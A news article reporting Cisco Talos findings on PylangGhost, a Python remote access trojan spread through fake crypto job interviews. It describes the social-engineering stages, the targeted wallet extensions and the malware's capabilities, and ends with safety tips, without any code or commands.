Cybersecurity experts have uncovered a disturbing campaign aimed at professionals in the blockchain sector, where fake job offers are being weaponized to deploy malicious software capable of stealing cryptocurrency wallet credentials and personal data.
According to a new report from Cisco Talos, a sophisticated remote access trojan (RAT) named PylangGhost has been observed targeting crypto enthusiasts and developers, particularly in regions like India. This malware, written in Python, is tied to a state-backed group often referred to as “Famous Chollima” (also known as “Wagemole”), believed to operate out of North Korea.
Deceptive Job Offers: The Perfect Bait
Victims are drawn in through fake job listings that imitate trusted companies in the crypto world—think names like Coinbase, Robinhood, and Uniswap. These fraudulent sites are meticulously designed to resemble real ones, tricking applicants into participating in staged recruitment processes.
Here's how the attack unfolds:
-
Initial contact: Victims receive messages from fake recruiters.
-
Skill assessment trap: They’re directed to seemingly legitimate sites for coding tests.
-
Video interviews: Targets are prompted to enable webcam and mic access.
-
Malicious payload: They're persuaded to run specific "video driver update" commands—actually launching the malware.
Meet PylangGhost: A RAT with a Crypto Twist
PylangGhost, a Python-based evolution of the previously known GolangGhost malware, offers an expansive feature set. Once deployed, it grants remote control over the compromised machine, allowing attackers to harvest sensitive information from over 80 browser extensions.
-
MetaMask
-
1Password
-
NordPass
-
Phantom
-
TronLink
-
Bitski
-
Initia
-
MultiverseX
More Than Just a Stealer
PylangGhost isn’t limited to snatching wallet data. It comes equipped with a wide toolkit:
-
Captures screenshots
-
Navigates and manipulates local files
-
Extracts browser session data
-
Scans system specifications
-
Maintains persistent remote access
Same Tactics, Evolving Tools
These social engineering strategies aren’t new. Similar scams were seen earlier this year when attackers linked to a $1.4 billion Bybit crypto heist baited developers with bogus recruitment exams—those, too, were infected with trojans.
Was AI Involved in the Malware Code?
Interestingly, analysis of the source code suggests that no large language model (like ChatGPT) was used in its development. Human-written comments and scripting styles point toward manual crafting, hinting at a deliberate attempt to avoid AI fingerprints.
How to Stay Safe
-
Always verify job opportunities through official company channels.
-
Avoid executing terminal commands during interviews, no matter how legitimate they appear.
-
Use sandbox environments for testing unknown applications or links.
-
Keep browser extensions and password managers updated with security patches.
